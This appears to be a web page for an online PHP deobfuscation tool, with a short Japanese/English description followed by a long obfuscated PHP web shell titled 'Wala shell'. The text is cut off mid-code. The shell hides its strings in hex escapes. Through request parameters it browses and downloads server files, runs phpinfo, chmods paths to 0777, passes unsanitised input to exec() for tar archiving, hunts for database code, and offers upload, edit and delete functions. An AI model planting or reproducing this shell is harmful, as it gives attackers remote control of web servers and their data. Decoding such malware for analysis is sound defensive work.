Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php ${"\x47\x4cO\x42\x41LS"}["\x61e\x71\x74\x75\x75"]="s\x74r\x65\x61\x6d";${"G\x4c\x4f\x42A\x4c\x53"}["\x73\x72\x76y\x79t\x71"]="t\x61\x72\x67e\x74_p\x61\x74\x68";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x69\x63ei\x67\x66"]="\x66\x69\x6c\x65\x4c\x69s\x74";${"G\x4cO\x42AL\x53"}["t\x66\x69\x79o\x72\x65"]="\x63o\x6e\x74\x65\x6e\x74\x73";${"G\x4c\x4f\x42\x41\x4cS"}["\x70\x64w\x6b\x67g\x68"]="\x64ir\x4ci\x73t";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x62\x72\x75\x79g\x65\x64\x6fg\x78"]="d\x69\x72";${"\x47LO\x42\x41\x4cS"}["\x74\x75p\x70e\x6di\x6b\x79\x79"]="\x64";${"\x47\x4cO\x42A\x4c\x53"}["\x66j\x6d\x61\x6f\x70\x72\x78tc\x77v"]="\x63\x6f\x6e\x53\x74\x72i\x6e\x67";${"\x47L\x4fB\x41\x4cS"}["\x63\x74\x6a\x75\x68\x79"]="\x68\x61\x6e\x64\x6c\x65";${"G\x4cOBA\x4cS"}["\x67\x61\x6d\x70\x6d\x72\x77\x64\x72"]="\x66\x69le";${"G\x4c\x4f\x42\x41\x4cS"}["\x6c\x78z\x75\x70\x78\x70\x63v"]="f\x69\x6ce\x6e\x61\x6d\x65";${"\x47\x4cO\x42AL\x53"}["bh\x6cs\x6e\x78w\x67\x67s\x72"]="\x6f\x75\x74\x70\x75\x74";${"\x47\x4c\x4f\x42A\x4cS"}["\x68bjl\x78\x72"]="\x61rc\x68\x69ve";${"G\x4c\x4f\x42\x41\x4cS"}["\x76\x65\x6epj\x61"]="\x64\x69\x72\x50ar\x74s";${"G\x4cOB\x41L\x53"}["hj\x75\x68\x6b\x62\x77"]="\x64i\x72\x65c\x74or\x79";${"G\x4c\x4fB\x41\x4c\x53"}["\x72j\x77\x72m\x66y\x62k\x73\x62"]="\x66\x69x\x65\x64Path";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x77jm\x73\x70\x66"]="\x66\x69\x72\x73\x74P\x69\x65\x63e";${"G\x4cO\x42AL\x53"}["\x7a\x65\x6ff\x6f\x71\x74\x7a\x70s\x62\x6a"]="\x6c\x61\x73\x74Ke\x79";${"\x47\x4cOB\x41\x4c\x53"}["\x73\x71o\x78\x6a\x62\x77f\x76\x6b\x6a\x73"]="\x76al";${"\x47\x4cO\x42\x41\x4c\x53"}["\x70\x76l\x78i\x70\x7ab\x76\x64\x63\x64"]="\x6b\x65y";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["q\x69\x76\x73\x65\x6a\x79q\x6b\x6d\x6bv"]="\x70\x61\x72\x74s";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x63\x72\x66\x69\x69d"]="\x70\x61\x74\x68";${"\x47\x4c\x4f\x42AL\x53"}["\x65\x67\x72\x6e\x72og\x6e\x6d\x6c"]="\x73\x6c\x61\x73\x68";${"\x47\x4c\x4fB\x41\x4cS"}["\x6e\x7a\x6ffzd\x7a"]="\x72\x6f\x6ft\x44\x69r";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x74\x68jj\x79nv\x72\x6f\x78"]="\x69sLi\x6e\x75\x78";${"\x47\x4c\x4f\x42A\x4c\x53"}["l\x70\x6c\x6bc\x73\x6f\x70ryo"]="c\x77d";${"G\x4c\x4f\x42\x41\x4cS"}["b\x63\x6cge\x74\x6e\x72\x69d\x65"]="\x64\x72\x69\x76e\x4c\x65\x74\x74\x65\x72";$nmsircz="sl\x61\x73h";${"\x47\x4cOBA\x4c\x53"}["\x73\x74\x73\x70\x6bu\x70\x78\x66\x6b"]="\x63\x77\x64";echo "<html \x78mln\x73\x3d\"h\x74t\x70://\x77w\x77.w3.\x6f\x72g/1\x3999/\x78ht\x6d\x6c\x22>\n<head\x3e\n\x3cmet\x61\x20\x68\x74t\x70-\x65qu\x69\x76\x3d\"Co\x6ete\x6et-Ty\x70\x65\x22 c\x6f\x6eten\x74=\x22t\x65xt/\x68t\x6dl; char\x73\x65t\x3d\x75\x74f-8\" />\n\x3c\x74i\x74le\x3eW\x61\x6c\x61\x20shel\x6c</t\x69t\x6ce>\n</\x68ead>\x3ccen\x74er>\n \n</\x68tm\x6c\x3e\n\n";$mbtmczex="is\x4c\x69\x6e\x75\x78";$mpayixqygf="i\x73\x4c\x69n\x75\x78";function isLinux($path){${"G\x4c\x4f\x42\x41\x4cS"}["w\x6dxno\x77\x68"]="path";return(substr(${${"\x47\x4c\x4fB\x41\x4cS"}["\x77\x6d\x78\x6e\x6fw\x68"]},0,1)=="/"?true:false);}function getSlashDir($isLinux){${"G\x4c\x4fB\x41L\x53"}["\x79j\x77\x6d\x78\x64\x77\x68ge"]="\x69\x73\x4c\x69\x6e\x75\x78";return(${${"\x47LO\x42\x41\x4c\x53"}["\x79\x6awm\x78\x64w\x68ge"]}?"/":"\\");}${${"G\x4c\x4f\x42ALS"}["\x73\x74\x73\x70\x6b\x75\x70xfk"]}=getcwd();$oxkdkgswe="\x73\x6ca\x73h";${$mpayixqygf}=isLinux(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x73\x74\x73pk\x75\x70\x78\x66\x6b"]});if(!${$mbtmczex}){$jydnvsbmck="\x63w\x64";${${"\x47L\x4f\x42A\x4cS"}["bc\x6c\x67\x65\x74\x6e\x72i\x64\x65"]}=substr(${$jydnvsbmck},0,1);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["z\x63\x67r\x6f\x6a\x64"]="\x73l\x61\x73h";${"\x47L\x4fB\x41\x4cS"}["\x6b\x6cdm\x6a\x75e"]="\x70\x61r\x74\x73";${$nmsircz}=getSlashDir(${${"GLOBAL\x53"}["\x74hj\x6a\x79\x6e\x76\x72\x6fx"]});${${"\x47\x4cO\x42\x41\x4c\x53"}["k\x6c\x64m\x6a\x75e"]}=explode(${$oxkdkgswe},${${"G\x4c\x4f\x42A\x4c\x53"}["lp\x6ck\x63sop\x72\x79\x6f"]});${${"\x47L\x4f\x42ALS"}["\x6ezo\x66\x7a\x64\x7a"]}=(${${"G\x4c\x4fBA\x4cS"}["\x74\x68\x6a\x6a\x79\x6e\x76\x72\x6f\x78"]}?${${"\x47\x4cO\x42\x41\x4cS"}["\x7acg\x72\x6f\x6ad"]}:(${${"\x47L\x4f\x42A\x4c\x53"}["\x62c\x6c\x67\x65\x74\x6e\x72\x69d\x65"]}.":".${${"\x47L\x4f\x42\x41\x4cS"}["eg\x72\x6e\x72og\x6e\x6dl"]}));function cleanPath($path,$isLinux){${"\x47\x4cO\x42\x41L\x53"}["\x77\x62\x76sc\x6c\x75"]="\x70\x61r\x74s";$rvtodmzazvn="v\x61\x6c";$uybbqkvjk="\x73l\x61\x73\x68";${"G\x4c\x4f\x42\x41L\x53"}["\x75\x68oa\x70p\x76\x65\x75\x6fd"]="p\x61rt\x73";$esfdjlqekqv="\x69\x73\x4c\x69\x6e\x75x";${$uybbqkvjk}=getSlashDir(${${"\x47\x4cOBA\x4c\x53"}["\x74\x68\x6aj\x79\x6e\x76\x72\x6fx"]});${${"\x47LO\x42A\x4c\x53"}["u\x68\x6f\x61p\x70ve\x75od"]}=explode(${${"GL\x4fBA\x4c\x53"}["\x65\x67\x72\x6ero\x67nm\x6c"]},${${"\x47\x4cO\x42A\x4c\x53"}["c\x72\x66\x69\x69\x64"]});foreach(${${"\x47\x4c\x4fBA\x4cS"}["q\x69v\x73\x65\x6a\x79q\x6b\x6dk\x76"]} as${${"\x47L\x4f\x42\x41\x4c\x53"}["\x70\x76\x6cxip\x7a\x62\x76dcd"]}=>${$rvtodmzazvn}){${"G\x4c\x4fBA\x4c\x53"}["e\x74\x6c\x6cn\x6b\x70q\x74"]="\x76\x61l";if(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x73q\x6fxj\x62w\x66v\x6bjs"]}=="\x2e."){${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6d\x74\x69\x72il\x67\x70y\x6d"]="\x70a\x72\x74\x73";$jycsygdpkne="\x6c\x61\x73\x74\x4b\x65\x79";${${"G\x4cOB\x41L\x53"}["\x6d\x74\x69ril\x67\x70y\x6d"]}[${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x70\x76\x6c\x78\x69p\x7abvdc\x64"]}]="";${$jycsygdpkne}=${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x70\x76\x6cxi\x70\x7a\x62v\x64\x63\x64"]}-1;${${"\x47\x4c\x4f\x42ALS"}["\x71\x69v\x73\x65j\x79\x71k\x6d\x6b\x76"]}[${${"\x47L\x4fB\x41\x4c\x53"}["\x7a\x65\x6f\x66\x6f\x71\x74zp\x73b\x6a"]}]="";}elseif(${${"\x47\x4cOB\x41\x4c\x53"}["\x65t\x6cl\x6e\x6bp\x71\x74"]}=="."){$qcpqxbuwf="\x6bey";${"G\x4cOBALS"}["u\x63\x73wqdw"]="\x70\x61\x72t\x73";${${"\x47\x4cO\x42\x41\x4cS"}["\x75\x63\x73w\x71\x64\x77"]}[${$qcpqxbuwf}]="";}}$grobatfhj="\x66\x69\x72\x73\x74\x50\x69\x65\x63\x65";${"\x47\x4cO\x42A\x4c\x53"}["nr\x6b\x75o\x6fv\x6f"]="\x66\x69\x78\x65\x64\x50\x61th";reset(${${"G\x4c\x4f\x42\x41\x4cS"}["wbv\x73c\x6c\x75"]});${${"G\x4c\x4f\x42\x41LS"}["\x6e\x72ku\x6f\x6f\x76\x6f"]}=(${$esfdjlqekqv}?"/":"");${"G\x4c\x4fB\x41\x4cS"}["\x71\x65\x75\x79ptj"]="\x76\x61\x6c";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x71\x79\x76\x72\x6dtnkhq"]="f\x69\x78\x65\x64Pa\x74\x68";${"G\x4c\x4fB\x41\x4c\x53"}["\x70\x78\x6dm\x73\x6et\x66\x74"]="s\x6c\x61s\x68";${$grobatfhj}=true;foreach(${${"GL\x4f\x42\x41\x4c\x53"}["\x71\x69\x76s\x65\x6ay\x71\x6b\x6d\x6b\x76"]} as${${"GLO\x42\x41\x4c\x53"}["qeuy\x70\x74j"]}){if(${${"GL\x4f\x42\x41L\x53"}["\x73\x71o\x78j\x62wf\x76\x6b\x6as"]}!=""){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x76\x61\x6c\x6bj\x74\x6c\x74\x6e\x68"]="\x66\x69\x72\x73\x74\x50i\x65\x63e";$vvpshinup="\x73l\x61s\x68";$onjwbuswr="\x66\x69\x78\x65dP\x61t\x68";${$onjwbuswr}.=(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x76al\x6bj\x74\x6c\x74n\x68"]}?"":${$vvpshinup}).${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x73\x71\x6f\x78\x6a\x62w\x66v\x6b\x6a\x73"]};${${"\x47LO\x42\x41\x4c\x53"}["\x77\x6a\x6dsp\x66"]}=false;}}if(${${"G\x4cO\x42A\x4cS"}["\x72\x6awrm\x66y\x62\x6b\x73\x62"]}==""){$jccbdm="\x73\x6c\x61sh";${"\x47L\x4fB\x41\x4c\x53"}["\x6e\x68\x77\x67\x62\x73eb"]="\x73l\x61s\x68";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["uj\x78\x78\x68\x61"]="\x64\x72\x69\x76\x65L\x65\x74\x74er";$qpmxlsuz="\x69sLin\x75\x78";${${"\x47\x4c\x4f\x42\x41L\x53"}["\x72j\x77r\x6d\x66\x79\x62\x6b\x73b"]}=(${$qpmxlsuz}?${$jccbdm}:(${${"GL\x4f\x42\x41LS"}["u\x6a\x78\x78\x68\x61"]}.":".${${"G\x4cOB\x41L\x53"}["nhw\x67bs\x65b"]}));}if(substr(${${"G\x4c\x4f\x42\x41LS"}["r\x6aw\x72m\x66\x79\x62ks\x62"]},-1)!=${${"\x47LO\x42\x41\x4c\x53"}["\x70\x78\x6d\x6ds\x6etf\x74"]})${${"GLO\x42ALS"}["r\x6a\x77\x72\x6d\x66y\x62\x6b\x73\x62"]}.=${${"\x47LOB\x41\x4c\x53"}["\x65\x67rn\x72og\x6e\x6d\x6c"]};return${${"\x47\x4cO\x42\x41\x4c\x53"}["\x71\x79\x76rm\x74\x6e\x6bh\x71"]};}if(isset($_REQUEST["\x63\x68m"])){${"\x47L\x4f\x42A\x4cS"}["\x77\x64\x63u\x6er\x69\x6c\x6f\x7a\x79z"]="i\x73\x4c\x69\x6eux";if(!${${"\x47L\x4fBALS"}["\x77\x64c\x75\x6er\x69l\x6f\x7a\x79\x7a"]}){echo"Thi\x73 \x66\x65\x61t\x75r\x65 \x6f\x6e\x6cy\x20\x77\x6frk\x73 o\x6e L\x69n\x75\x78";}else{echo(@chmod($_REQUEST["ch\x6d"],0777)?"R\x65\x61s\x73i\x67\x6e\x65d":"C\x61n't Re\x61\x73ign");}}elseif(isset($_REQUEST["p\x68\x70info"])){phpinfo();}elseif(isset($_REQUEST["\x64l"])){if(@fopen($_REQUEST["dl"].$_REQUEST["\x66il\x65"],"\x72")==true){$edbftmvcl="sl\x61sh";$sotdkqgxy="\x66\x69\x6c\x65A\x72\x72";$_REQUEST["\x64l"].=$_REQUEST["\x66il\x65"];if(substr($_REQUEST["dl"],0,1)==${$edbftmvcl})${$sotdkqgxy}=explode(${${"\x47\x4c\x4fBAL\x53"}["\x65\x67r\x6e\x72\x6fgn\x6d\x6c"]},$_REQUEST["\x64\x6c"]);header("\x43\x6f\x6et\x65\x6e\x74-\x64\x69s\x70\x6fs\x69\x74i\x6f\x6e:\x20\x61\x74\x74ac\x68\x6de\x6e\x74;\x20fi\x6c\x65\x6e\x61\x6d\x65\x3d".$_REQUEST["fil\x65"]);header("\x43on\x74e\x6e\x74-ty\x70\x65:\x20ap\x70l\x69cation/\x6fct\x65\x74-s\x74\x72\x65a\x6d");readfile($_REQUEST["dl"]);}else{echo$_REQUEST["\x64l"];}}elseif(isset($_REQUEST["\x67z"])){if(!${${"\x47\x4c\x4fBAL\x53"}["thjjy\x6evr\x6f\x78"]}){echo"T\x68\x69\x73 f\x65at\x75re o\x6e\x6cy w\x6f\x72\x6b\x73\x20\x6f\x6e \x4c\x69\x6eu\x78";}else{${"\x47\x4c\x4f\x42ALS"}["\x77i\x6d\x76wyd\x71t\x61\x73"]="\x64\x69\x72e\x63to\x72y";${${"G\x4cO\x42\x41LS"}["\x77\x69\x6d\x76\x77\x79\x64\x71\x74as"]}=$_REQUEST["gz"];${"\x47\x4c\x4f\x42\x41\x4cS"}["\x77b\x6cgc\x66\x6bx\x7asmu"]="\x66\x6eame";$gcctqyegmx="s\x6c\x61\x73h";${"\x47L\x4f\x42\x41L\x53"}["i\x69\x79\x70l\x77\x74\x65\x77"]="\x64\x69r\x65cto\x72\x79";${"\x47\x4cO\x42A\x4cS"}["\x70vjtn\x64w"]="d\x69\x72\x65\x63\x74o\x72\x79";if(substr(${${"\x47\x4cO\x42AL\x53"}["\x68\x6au\x68\x6bb\x77"]},-1)=="/")${${"\x47L\x4f\x42\x41L\x53"}["\x70v\x6a\x74\x6e\x64\x77"]}=substr(${${"\x47\x4cOB\x41\x4cS"}["\x68\x6a\x75\x68\x6b\x62\x77"]},0,-1);${${"GLO\x42\x41\x4c\x53"}["v\x65\x6e\x70j\x61"]}=explode(${$gcctqyegmx},${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x69\x69\x79\x70lw\x74\x65\x77"]});${${"\x47L\x4f\x42A\x4c\x53"}["w\x62\x6c\x67\x63\x66\x6b\x78zs\x6du"]}=${${"\x47\x4c\x4f\x42\x41L\x53"}["v\x65np\x6aa"]}[(sizeof(${${"G\x4cO\x42\x41L\x53"}["v\x65n\x70\x6aa"]})-1)];${${"\x47\x4c\x4f\x42A\x4cS"}["\x68b\x6al\x78\x72"]}=time();${"GLO\x42A\x4cS"}["\x77\x77q\x67h\x78\x73\x71"]="\x61\x72c\x68i\x76\x65";exec("\x63\x64\x20$directory; t\x61\x72\x20c\x7a\x66 $archive\x20*");$xfvphtvcgazf="out\x70\x75t";${"\x47L\x4f\x42\x41\x4c\x53"}["\x72\x64\x73\x69t\x65j\x67"]="di\x72\x65\x63\x74\x6fr\x79";${$xfvphtvcgazf}=@file_get_contents(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68\x6a\x75\x68k\x62\x77"]}."/".${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68\x62\x6a\x6c\x78\x72"]});if(!${${"G\x4cO\x42\x41LS"}["\x62\x68\x6c\x73\x6e\x78\x77\x67\x67s\x72"]})header("C\x6fntent-\x64\x69\x73\x70o\x73\x69\x74\x69\x6fn: at\x74\x61\x63\x68\x6den\x74\x3b f\x69l\x65na\x6de\x3dACCE\x53\x53\x5fP\x52OB\x4c\x45\x4d");else{$uefkgqk="\x6f\x75\x74\x70u\x74";header("Con\x74\x65\x6e\x74-\x64is\x70o\x73\x69\x74\x69on: a\x74\x74\x61c\x68me\x6et\x3b\x20\x66\x69l\x65n\x61m\x65\x3d$fname.\x74g\x7a");echo${$uefkgqk};}header("\x43on\x74e\x6e\x74-\x74\x79\x70e:\x20ap\x70\x6c\x69\x63\x61\x74\x69on/o\x63\x74e\x74-str\x65\x61m");@unlink(${${"\x47\x4c\x4fB\x41\x4cS"}["\x72\x64\x73i\x74ej\x67"]}."/".${${"G\x4c\x4f\x42\x41\x4cS"}["\x77\x77\x71\x67\x68\x78\x73\x71"]});}}elseif(isset($_REQUEST["f"])){$mlsnoxbx="\x66\x69\x6ce";${${"G\x4cO\x42AL\x53"}["\x6c\x78\x7a\x75p\x78pcv"]}=$_REQUEST["f"];${${"G\x4c\x4f\x42\x41\x4c\x53"}["g\x61m\x70m\x72\x77\x64r"]}=fopen("$filename","\x72b");header("C\x6f\x6eten\x74-Typ\x65: t\x65xt/\x70l\x61i\x6e");fpassthru(${$mlsnoxbx});}elseif(isset($_REQUEST["d"])){${"\x47\x4c\x4f\x42A\x4cS"}["\x63y\x76\x6bjst\x75"]="\x64";${${"\x47\x4cOB\x41\x4c\x53"}["c\x79\x76k\x6a\x73\x74\x75"]}=$_REQUEST["d"];echo"\x3c\x70\x72\x65>";if(${${"\x47\x4cO\x42A\x4c\x53"}["\x63t\x6auh\x79"]}=opendir("$d")){${"\x47\x4c\x4f\x42\x41\x4cS"}["s\x72d\x76w\x70\x67\x63\x71"]="f\x69\x6ceL\x69\x73t";echo"<\x68\x32\x3eL\x6fk\x61\x73\x69\x20:\x20";$nyufbdibp="i\x73\x4c\x69\x6e\x75\x78";${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x66j\x6d\x61\x6f\x70r\x78\x74\x63\x77\x76"]}="";$eykhqnuhudil="\x64\x69\x72L\x69s\x74";$qcnrlilvhx="\x69sL\x69\x6e\x75x";if(${$qcnrlilvhx})echo"\x3c\x61\x20\x68re\x66='?d=$slash\x27>$slash\x3c/a\x3e";foreach(explode(${${"G\x4cO\x42\x41\x4cS"}["egrn\x72\x6fg\x6e\x6d\x6c"]},cleanPath(${${"\x47\x4cOB\x41\x4c\x53"}["\x74\x75\x70pem\x69\x6b\x79\x79"]},${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74\x68\x6ajy\x6ev\x72\x6f\x78"]}))as${${"GLO\x42\x41\x4c\x53"}["\x73\x71\x6f\x78\x6ab\x77fvkj\x73"]}){${"G\x4c\x4f\x42A\x4cS"}["\x73\x64\x77ew\x76\x6do"]="\x73\x6c\x61\x73\x68";$dsgjitgrlgeh="\x73\x6ca\x73\x68";${${"GL\x4fBA\x4cS"}["\x66jmao\x70\x72xt\x63w\x76"]}.=${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x73\x71\x6f\x78\x6a\x62w\x66v\x6b\x6a\x73"]}.${$dsgjitgrlgeh};echo"\x3c\x61\x20h\x72\x65\x66\x3d'?\x64=$conString\x27\x3e".${${"\x47L\x4f\x42\x41\x4c\x53"}["s\x71\x6f\x78\x6a\x62w\x66v\x6bjs"]}."</\x61\x3e".(${${"G\x4c\x4f\x42\x41L\x53"}["\x73\x71\x6f\x78\x6ab\x77\x66\x76\x6bj\x73"]}!=""?${${"\x47L\x4f\x42\x41L\x53"}["\x73\x64w\x65wv\x6d\x6f"]}:"");}$mdjrskhod="di\x72";$imnhtso="i\x73\x4c\x69\x6e\x75\x78";echo"\x20(\x3ca targ\x65\x74\x3d\x27\x5f\x62\x6ca\x6e\x6b'\x20\x68\x72\x65\x66='?\x75\x70l\x6f\x61\x64\x46\x6f\x72\x6d\x3d\x31\x26di\x72\x3d".urlencode(cleanPath(${${"G\x4c\x4fB\x41\x4c\x53"}["t\x75\x70\x70e\x6d\x69\x6by\x79"]},${${"\x47\x4c\x4fBALS"}["t\x68\x6a\x6a\x79\x6e\x76rox"]}))."'\x3eu\x70lo\x61\x64 \x66i\x6c\x65</\x61>)\x20(\x3c\x61\x20h\x72\x65\x66=\x27?d=".urlencode(cleanPath(${${"\x47\x4cOB\x41L\x53"}["\x74u\x70\x70\x65\x6d\x69kyy"]},${${"\x47L\x4f\x42\x41\x4cS"}["\x74\x68\x6a\x6a\x79n\x76\x72\x6fx"]}))."&\x68l\x64\x62=1\x27>D\x42\x20\x69\x6et\x65\x72\x61\x63t\x69on fil\x65\x73\x20i\x6e \x72\x65d</a\x3e)</h\x32\x3e (\x3ca ta\x72\x67\x65t\x3d'\x5f\x62l\x61n\x6b\x27\x20h\x72\x65f\x3d\x27?\x67z=".urlencode(cleanPath(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["t\x75\x70\x70\x65m\x69\x6b\x79\x79"]},${$imnhtso}))."\x27\x3eg\x7a\x69p \x26\x20do\x77nl\x6fa\x64 fo\x6c\x64e\x72</\x61>) (<\x61 ta\x72ge\x74\x3d'\x5fb\x6cank\x27 \x68\x72\x65\x66='?\x63hm\x3d".urlencode(cleanPath(${${"GL\x4fB\x41LS"}["\x74\x75\x70\x70\x65\x6d\x69\x6b\x79\x79"]},${$nyufbdibp}))."\x27\x3e\x63\x68\x6do\x64\x20f\x6f\x6cd\x65\x72\x20to\x207\x377)\x3c/a\x3e\x20\x3c\x62\x72 /\x3e";while(${$mdjrskhod}=readdir(${${"G\x4c\x4fB\x41\x4cS"}["c\x74\x6a\x75h\x79"]})){if(is_dir("$d$slash$dir")){if(${${"\x47\x4c\x4f\x42A\x4cS"}["b\x72u\x79\x67\x65d\x6fg\x78"]}!="."&&${${"\x47\x4cOB\x41LS"}["\x62\x72\x75\x79ged\x6fgx"]}!="\x2e.")${${"\x47L\x4f\x42AL\x53"}["\x70\x64\x77\x6b\x67\x67\x68"]}[]=${${"G\x4cO\x42\x41\x4c\x53"}["\x62\x72u\x79\x67\x65d\x6fgx"]};}else{if(isset($_REQUEST["\x68l\x64b"])){${"G\x4c\x4f\x42\x41\x4c\x53"}["\x65\x74mi\x6d\x65\x73h\x77\x6f\x6a"]="\x63\x6fnt\x65n\x74s";${${"\x47\x4c\x4fBA\x4c\x53"}["tfi\x79\x6f\x72e"]}=file_get_contents("$d$slash$dir");if(stripos(${${"GL\x4fBA\x4c\x53"}["\x65t\x6di\x6d\x65\x73hwo\x6a"]},"\x6dysq\x6c_")||stripos(${${"GLOB\x41\x4cS"}["t\x66\x69y\x6f\x72\x65"]},"\x6dy\x73q\x6c\x69_")||stripos(${${"\x47LO\x42A\x4c\x53"}["t\x66i\x79ore"]},"\x53\x45\x4cEC\x54\x20")){${"\x47\x4c\x4f\x42\x41L\x53"}["\x61d\x6c\x65j\x6dt\x72\x7a\x74"]="f\x69\x6c\x65\x4c\x69st";${${"\x47L\x4f\x42\x41\x4c\x53"}["\x61d\x6cejm\x74\x72\x7at"]}[]=array("\x64\x69\x72"=>${${"\x47\x4c\x4fB\x41L\x53"}["\x62\x72uyg\x65\x64o\x67x"]},"\x63o\x6c\x6f\x72"=>"\x72ed");}else{${"\x47L\x4f\x42\x41LS"}["\x71\x6f\x7atkus\x68mh\x73"]="\x66\x69le\x4c\x69s\x74";${${"G\x4c\x4fBA\x4c\x53"}["\x71\x6f\x7a\x74\x6b\x75\x73\x68\x6dh\x73"]}[]=array("\x64i\x72"=>${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x62\x72\x75y\x67\x65\x64\x6fgx"]},"c\x6flo\x72"=>"bl\x61\x63k");}}else{$slchbr="\x64\x69\x72";${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x69\x63e\x69gf"]}[]=array("di\x72"=>${$slchbr},"\x63ol\x6fr"=>"\x62lac\x6b");}}}echo"<a h\x72\x65\x66\x3d\x27?\x64=$d$slash.'\x3e\x3c\x66on\x74\x20co\x6c\x6fr=g\x72ey\x3e\x2e\n</f\x6f\x6e\x74\x3e</\x61\x3e";echo"<a\x20hr\x65\x66\x3d'?d\x3d$d$slash.\x2e'\x3e\x3cfont \x63ol\x6fr\x3dg\x72e\x79>\x2e.\n</font></\x61>";if(isset(${$eykhqnuhudil})){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["q\x79\x76b\x76v\x78"]="\x64ir\x4c\x69\x73\x74";if(is_array(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x71\x79vb\x76v\x78"]})){foreach(${${"\x47L\x4fB\x41\x4c\x53"}["\x70d\x77\x6bg\x67\x68"]} as${${"\x47L\x4f\x42\x41\x4c\x53"}["bru\x79\x67ed\x6fgx"]}){echo"<a\x20\x68\x72\x65\x66\x3d\x27?\x64=$d$slash$dir\x27><f\x6fnt co\x6c\x6f\x72=\x67\x72ey\x3e$dir\n</\x66\x6f\x6e\x74>\x3c/\x61\x3e";}}}if(isset(${${"\x47\x4c\x4fB\x41LS"}["\x73\x72\x64\x76\x77\x70\x67\x63q"]})){$euhpascf="\x66\x69\x6ce\x4ci\x73\x74";if(is_array(${$euhpascf})){${"\x47\x4cO\x42A\x4c\x53"}["\x6e\x68\x67\x72y\x74scr"]="\x64i\x72";foreach(${${"\x47\x4c\x4f\x42ALS"}["ic\x65\x69\x67\x66"]} as${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6e\x68\x67\x72yt\x73\x63\x72"]}){${"G\x4cO\x42\x41LS"}["\x71\x69\x62\x74\x69h"]="\x64ir";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x70d\x69\x63\x6ff\x73w"]="\x64";$oucbtemsdcgn="\x69\x73\x4ci\x6eux";echo"\x3c\x61\x20hr\x65\x66='?\x66\x3d$d".${${"\x47\x4c\x4fBA\x4cS"}["e\x67\x72\x6e\x72\x6f\x67\x6e\x6d\x6c"]}.${${"G\x4cOBAL\x53"}["\x62ruy\x67\x65\x64o\x67\x78"]}["\x64ir"]."'\x3e\x3cfo\x6e\x74\x20co\x6c\x6f\x72=".${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x62\x72uyg\x65\x64\x6f\x67x"]}["c\x6f\x6co\x72"]."\x3e".${${"\x47L\x4fB\x41\x4c\x53"}["q\x69bti\x68"]}["d\x69\x72"]."</\x66o\x6e\x74\x3e\x3c/\x61\x3e"."|<\x61\x20\x68\x72\x65f\x3d'?dl\x3d".cleanPath(${${"\x47L\x4f\x42AL\x53"}["t\x75\x70\x70e\x6d\x69k\x79\x79"]},${$oucbtemsdcgn})."\x26f\x69le=".${${"\x47L\x4fB\x41LS"}["b\x72\x75\x79\x67e\x64\x6fg\x78"]}["di\x72"]."\x27\x20tar\x67e\x74\x3d'_bl\x61n\x6b'\x3e\x44ownloa\x64\x3c/\x61\x3e|"."|\x3c\x61\x20\x68r\x65f\x3d'?ef\x3d".cleanPath(${${"G\x4c\x4f\x42\x41\x4c\x53"}["op\x64\x69c\x6ff\x73w"]},${${"G\x4cOBA\x4c\x53"}["\x74\x68\x6a\x6a\x79n\x76ro\x78"]})."&file\x3d".${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x62\x72\x75\x79g\x65d\x6f\x67\x78"]}["\x64i\x72"]."\x27 ta\x72ge\x74='_bl\x61\x6e\x6b\x27\x3eE\x64\x69t\x3c/\x61>|"."|<a href=\x27?\x64\x66\x3d".cleanPath(${${"GLOBA\x4c\x53"}["\x74\x75\x70\x70\x65mi\x6b\x79y"]},${${"GL\x4f\x42AL\x53"}["\x74\x68\x6aj\x79n\x76\x72\x6f\x78"]})."\x26f\x69\x6c\x65=".${${"\x47\x4c\x4fB\x41\x4c\x53"}["b\x72u\x79g\x65\x64\x6fg\x78"]}["dir"]."'\x20targ\x65\x74\x3d\x27\x5fbla\x6ek\x27\x3eD\x65\x6c\x65\x74\x65\x3c/a>|\x20\n";}}}}else echo"\x6fpend\x69r() f\x61\x69le\x64";closedir(${${"G\x4cO\x42A\x4c\x53"}["\x63\x74\x6au\x68\x79"]});}elseif(isset($_REQUEST["\x75\x70lo\x61\x64F\x6frm"])||isset($_FILES["f\x69l\x65\x5f\x6e\x61\x6de"])){if(isset($_FILES["\x66il\x65\x5f\x6e\x61me"])){if($_FILES["\x66i\x6c\x65_\x6e\x61\x6de"]["err\x6f\x72"]>0){echo"Er\x72\x6fr";}else{$dowxjrxgbp="t\x61rg\x65\x74\x5f\x70a\x74\x68";$kignxdnh="ta\x72g\x65\x74_\x70\x61t\x68";${${"GLO\x42\x41LS"}["\x73\x72\x76\x79y\x74q"]}=$_COOKIE["uploadDi\x72"];if(substr(${$dowxjrxgbp},-1)!="/")${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73rv\x79\x79\x74\x71"]}.="/";${${"G\x4cOB\x41\x4cS"}["\x73\x72\x76y\x79t\